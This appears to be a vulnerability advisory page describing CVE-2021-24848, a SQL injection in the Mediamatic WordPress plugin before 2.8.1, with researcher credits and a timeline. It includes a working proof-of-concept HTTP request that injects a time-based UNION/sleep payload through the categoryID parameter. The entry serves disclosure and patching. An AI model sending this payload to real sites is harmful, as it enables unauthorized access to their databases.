Mediamatic < 2.8.1 – Subscriber+ SQL Injection | CVE 2021-24848 | Plugin Vulnerabilities

Description

The mediamaticAjaxRenameCategory AJAX action of the plugin, available to any authenticated user, does not sanitise the categoryID parameter before using it in a SQL statement, leading to an SQL injection

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

action=mediamaticAjaxRenameCategory&categoryID=1+union+select+1+and+sleep(10)

Affects Plugins

Fixed in 2.8.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

156d4faf-7d34-4d9f-a654-9064d4eb3aea

Timeline

Publicly Published

2021-11-15 (about 4 years ago)

Added

2021-11-15 (about 4 years ago)

Last Updated

2022-09-26 (about 3 years ago)

Other

Published

Title

Published

2024-12-14

Title

Nabz Image Gallery <= v1.00 - Unauthenticated SQL Injection

Published

2025-01-03

Title

ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes < 1.5.0 - Shop manager+ SQL Injection

Published

2023-05-09

Title

Ultimate Addons for Contact Form 7 < 3.1.24 - Unauthenticated SQLi

Published

2025-06-19

Title

Video List Manager <= 1.7 - Authenticated (Contributor+) SQL Injection

Published

2021-07-15

Title

WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection